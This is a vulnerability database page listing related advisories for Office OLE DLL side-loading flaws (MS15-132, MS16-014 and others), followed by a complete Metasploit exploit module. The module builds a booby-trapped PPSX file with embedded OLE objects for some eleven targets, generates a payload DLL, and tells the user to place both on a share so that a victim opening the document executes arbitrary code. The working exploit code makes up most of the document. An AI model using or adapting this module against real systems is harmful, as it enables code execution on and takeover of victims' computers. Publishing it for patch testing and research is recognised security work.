Office OLE DLL Hijacking

🗓️ 10 Nov 2016 00:00:00Reported by Yorick KosterType

packetstorm🔗 packetstormsecurity.com👁 97 Views

Office OLE DLL Hijacking. Multiple DLL side loading vulnerabilities found in COM components can be exploited by loading them as embedded OLE objects. Opening a specially crafted Office document from a directory containing attacker's DLL file allows arbitrary code execution.

Reporter	Title	Published	Views	Family All 83
0day.today	Microsoft Office - OLE Multiple DLL Side Loading Vulnerabilities (MS15-132/MS16-014/MS16-025/MS16-04	23 Mar 201700:00	–	zdt
ATTACKERKB	CVE-2016-3235	16 Jun 201600:00	–	attackerkb
ATTACKERKB	MS15-134 Microsoft Office COM Object DLL Planting with els.dll	9 Dec 201500:00	–	attackerkb
Circl	CVE-2015-6128	8 Dec 201500:00	–	circl
Circl	CVE-2015-6132	8 Dec 201500:00	–	circl
Circl	CVE-2015-6133	8 Dec 201500:00	–	circl
Circl	CVE-2016-0041	8 Dec 201500:00	–	circl
Circl	CVE-2016-0100	8 Dec 201500:00	–	circl
Circl	CVE-2016-3235	8 Dec 201500:00	–	circl
CISA KEV Catalog	Microsoft Office OLE DLL Side Loading Vulnerability	3 Nov 202100:00	–	cisa_kev

`require 'zip'  
require 'base64'  
require 'msf/core'  
require 'rex/ole'  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Msf::Exploit::FILEFORMAT  
include Msf::Exploit::EXE  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Office OLE Multiple DLL Side Loading Vulnerabilities',  
'Description' => %q{  
Multiple DLL side loading vulnerabilities were found in various COM components.  
These issues can be exploited by loading various these components as an embedded  
OLE object. When instantiating a vulnerable object Windows will try to load one  
or more DLLs from the current working directory. If an attacker convinces the  
victim to open a specially crafted (Office) document from a directory also  
containing the attacker's DLL file, it is possible to execute arbitrary code with  
the privileges of the target user. This can potentially result in the attacker  
taking complete control of the affected system.  
},  
'Author' => 'Yorick Koster',  
'License' => MSF_LICENSE,  
'References' =>  
[  
['CVE', '2015-6132'],  
['CVE', '2015-6128'],  
['CVE', '2015-6133'],  
['CVE', '2016-0041'],  
['CVE', '2016-0100'],  
['CVE', '2016-3235'],  
['MSB', 'MS15-132'],  
['MSB', 'MS16-014'],  
['MSB', 'MS16-025'],  
['MSB', 'MS16-041'],  
['MSB', 'MS16-070'],  
['URL', 'https://securify.nl/advisory/SFY20150801/com__services_dll_side_loading_vulnerability.html'],  
['URL', 'https://securify.nl/advisory/SFY20150805/event_viewer_snapin_multiple_dll_side_loading_vulnerabilities.html'],  
['URL', 'https://securify.nl/advisory/SFY20150803/windows_authentication_ui_dll_side_loading_vulnerability.html'],  
['URL', 'https://securify.nl/advisory/SFY20151102/shutdown_ux_dll_side_loading_vulnerability.html'],  
['URL', 'https://securify.nl/advisory/SFY20150802/shockwave_flash_object_dll_side_loading_vulnerability.html'],  
['URL', 'https://securify.nl/advisory/SFY20150806/ole_db_provider_for_oracle_multiple_dll_side_loading_vulnerabilities.html'],  
['URL', 'https://securify.nl/advisory/SFY20150905/nps_datastore_server_dll_side_loading_vulnerability.html'],  
['URL', 'https://securify.nl/advisory/SFY20150906/bda_mpeg2_transport_information_filter_dll_side_loading_vulnerability.html'],  
['URL', 'https://securify.nl/advisory/SFY20151101/mapsupdatetask_task_dll_side_loading_vulnerability.html'],  
['URL', 'https://securify.nl/advisory/SFY20150904/windows_mail_find_people_dll_side_loading_vulnerability.html'],  
['URL', 'https://securify.nl/advisory/SFY20150804/microsoft_visio_multiple_dll_side_loading_vulnerabilities.html'],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread',  
'PAYLOAD' => 'windows/exec',  
'CMD' => 'C:\\Windows\\System32\\calc.exe',  
},  
'Payload' => { 'Space' => 2048, },  
'Platform' => 'win',  
'Arch' => [ ARCH_X86, ARCH_X86_64 ],  
'Targets' =>  
[  
[ 'All', {} ],  
[  
'COM+ Services / Windows Vista - 10 / Office 2007 - 2016 (MS15-132)',  
{  
'DLL' => 'mqrt.dll',  
# {ecabafc9-7f19-11d2-978e-0000f8757e2a}  
'CLSID' => "\xC9\xAF\xAB\xEC\x19\x7F\xD2\x11\x97\x8E\x00\x00\xF8\x75\x7E\x2A"  
}  
],  
[  
'Shockwave Flash Object / Windows 10 / Office 2013 (APSB15-28)',  
{  
'DLL' => 'spframe.dll',  
# {D27CDB6E-AE6D-11cf-96B8-444553540000}  
'CLSID' => "\x6E\xDB\x7C\xD2\x6D\xAE\xCF\x11\x96\xB8\x44\x45\x53\x54\x00\x00"  
}  
],  
[  
'Windows Authentication UI / Windows 10 / Office 2013 - 2016 (MS15-132)',  
{  
'DLL' => 'wuaext.dll',  
# {D93CE8B5-3BF8-462C-A03F-DED2730078BA}  
'CLSID' => "\xB5\xE8\x3C\xD9\xF8\x3B\x2C\x46\xA0\x3F\xDE\xD2\x73\x00\x78\xBA"  
}  
],  
[  
'Shutdown UX / Windows 10 / Office 2016 (MS15-132)',  
{  
'DLL' => 'wuaext.dll',  
# {14ce31dc-abc2-484c-b061-cf3416aed8ff}  
'CLSID' => "\xDC\x31\xCE\x14\xC2\xAB\x4C\x48\xB0\x61\xCF\x34\x16\xAE\xD8\xFF"  
}  
],  
[  
'MapUpdateTask Tasks / Windows 10 / Office 2016 (MS16-014)',  
{  
'DLL' => 'phoneinfo.dll',  
# {B9033E87-33CF-4D77-BC9B-895AFBBA72E4}  
'CLSID' => "\x87\x3E\x03\xB9\xCF\x33\x77\x4D\xBC\x9B\x89\x5A\xFB\xBA\x72\xE4"  
}  
],  
[  
'Microsoft Visio 2010 / Windows 7 (MS16-070)',  
{  
'DLL' => 'msoutls.dll',  
# 6C92B806-B900-4392-89F7-2ED4B4C23211}  
'CLSID' => "\x06\xB8\x92\x6C\x00\xB9\x92\x43\x89\xF7\x2E\xD4\xB4\xC2\x32\x11"  
}  
],  
[  
'Event Viewer Snapin / Windows Vista - 7 / Office 2007 - 2013 (MS15-132)',  
{  
'DLL' => 'elsext.dll',  
# {394C052E-B830-11D0-9A86-00C04FD8DBF7}  
'CLSID' => "\x2E\x05\x4C\x39\x30\xB8\xD0\x11\x9A\x86\x00\xC0\x4F\xD8\xDB\xF7"  
}  
],  
[  
'OLE DB Provider for Oracle / Windows Vista - 7 / Office 2007 - 2013 (MS16-014)',  
{  
'DLL' => 'oci.dll',  
# {e8cc4cbf-fdff-11d0-b865-00a0c9081c1d}  
'CLSID' => "\xBF\x4C\xCC\xE8\xFF\xFD\xD0\x11\xB8\x65\x00\xA0\xC9\x08\x1C\x1D"  
}  
],  
[  
'Windows Mail Find People / Windows Vista / Office 2010 (MS16-025)',  
{  
'DLL' => 'wab32res.dll',  
# {32714800-2E5F-11d0-8B85-00AA0044F941}  
'CLSID' => "\x00\x48\x71\x32\x5F\x2E\xD0\x11\x8B\x85\x00\xAA\x00\x44\xF9\x41"  
}  
],  
[  
'NPS Datastore server / Windows Vista / Office 2010 (MS16-014)',  
{  
'DLL' => 'iasdatastore2.dll',  
# {48da6741-1bf0-4a44-8325-293086c79077}  
'CLSID' => "\x41\x67\xDA\x48\xF0\x1B\x44\x4A\x83\x25\x29\x30\x86\xC7\x90\x77"  
}  
],  
[  
'BDA MPEG2 Transport Information Filter / Windows Vista / Office 2010 (MS16-014)',  
{  
'DLL' => 'ehTrace.dll',  
# {FC772AB0-0C7F-11D3-8FF2-00A0C9224CF4}  
'CLSID' => "\xB0\x2A\x77\xFC\x7F\x0C\xD3\x11\x8F\xF2\x00\xA0\xC9\x22\x4C\xF4"  
}  
],  
],  
'Privileged' => false,  
'DisclosureDate' => 'Dec 8 2015',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx']),  
], self.class)  
end  
  
def exploit  
if target.name == 'All'  
targets = @targets  
else  
targets = [ target ]  
end  
  
@arch.each do |a|  
exploit_regenerate_payload('win', a, nil)  
targets.each do |t|  
if t.name == 'All'  
next  
end  
print_status("Using target #{t.name}")  
  
dll_name = t['DLL']  
if target.name == 'All'  
ppsx_name = t.name.split(/\//).first + ".ppsx"  
else  
ppsx_name = datastore['FILENAME']  
end  
  
print_status("Creating the payload DLL (#{a})...")  
  
opts = {}  
opts[:arch] = [ a ]  
dll = generate_payload_dll(opts)  
dll_path = store_file(dll, a, dll_name)  
print_good("#{dll_name} stored at #{dll_path}, copy it to a remote share")  
  
print_status("Creating the PPSX file...")  
ppsx = get_ppsx(t['CLSID'])  
ppsx_path = store_file(ppsx, a, ppsx_name)  
print_good("#{ppsx_name} stored at #{ppsx_path}, copy it to a remote share")  
end  
end  
end  
  
def store_file(data, subdir, filename)  
ltype = "exploit.fileformat.#{self.shortname}"  
  
if ! ::File.directory?(Msf::Config.local_directory)  
FileUtils.mkdir_p(Msf::Config.local_directory)  
end  
  
subdir.gsub!(/[^a-z0-9\.\_\-]+/i, '')  
if ! ::File.directory?(Msf::Config.local_directory + "/" + subdir)  
FileUtils.mkdir_p(Msf::Config.local_directory + "/" + subdir)  
end  
  
if filename and not filename.empty?  
if filename =~ /(.*)\.(.*)/  
ext = $2  
fname = $1  
else  
fname = filename  
end  
else  
fname = "local_#{Time.now.utc.to_i}"  
end  
  
fname = ::File.split(fname).last  
  
fname.gsub!(/[^a-z0-9\.\_\-]+/i, '')  
fname << ".#{ext}"  
  
path = File.join(Msf::Config.local_directory + "/" + subdir, fname)  
full_path = ::File.expand_path(path)  
File.open(full_path, "wb") { |fd| fd.write(data) }  
  
report_note(:data => full_path.dup, :type => "#{ltype}.localpath")  
  
full_path.dup  
end  
  
def create_ole(clsid)  
ole_tmp = Rex::Quickfile.new('ole')  
stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE)  
  
stm = stg.create_stream("\x01OLE10Native")  
stm.close  
  
directory = stg.instance_variable_get(:@directory)  
directory.each_entry do |entry|  
if entry.instance_variable_get(:@_ab) == 'Root Entry'  
clsid = Rex::OLE::CLSID.new(clsid)  
entry.instance_variable_set(:@_clsId, clsid)  
end  
end  
  
# write to disk  
stg.close  
  
ole_contents = File.read(ole_tmp.path)  
ole_tmp.close  
ole_tmp.unlink  
  
ole_contents  
end  
  
def get_ppsx(clsid)  
path = ::File.join(Msf::Config.data_directory, 'exploits', 'office_ole_multiple_dll_hijack.ppsx')  
fd = ::File.open(path, "rb")  
data = fd.read(fd.stat.size)  
fd.close  
ppsx = Rex::Zip::Archive.new  
  
Zip::InputStream.open(StringIO.new(data)) do |zis|  
while entry = zis.get_next_entry  
ppsx.add_file(entry.name, zis.read)  
end  
end  
  
ppsx.add_file('/ppt/embeddings/oleObject1.bin', create_ole(clsid))  
ppsx.pack  
end  
  
end  
`

10 Nov 2016 00:00Current

0.1Low risk

Vulners AI Score0.1

EPSS0.81164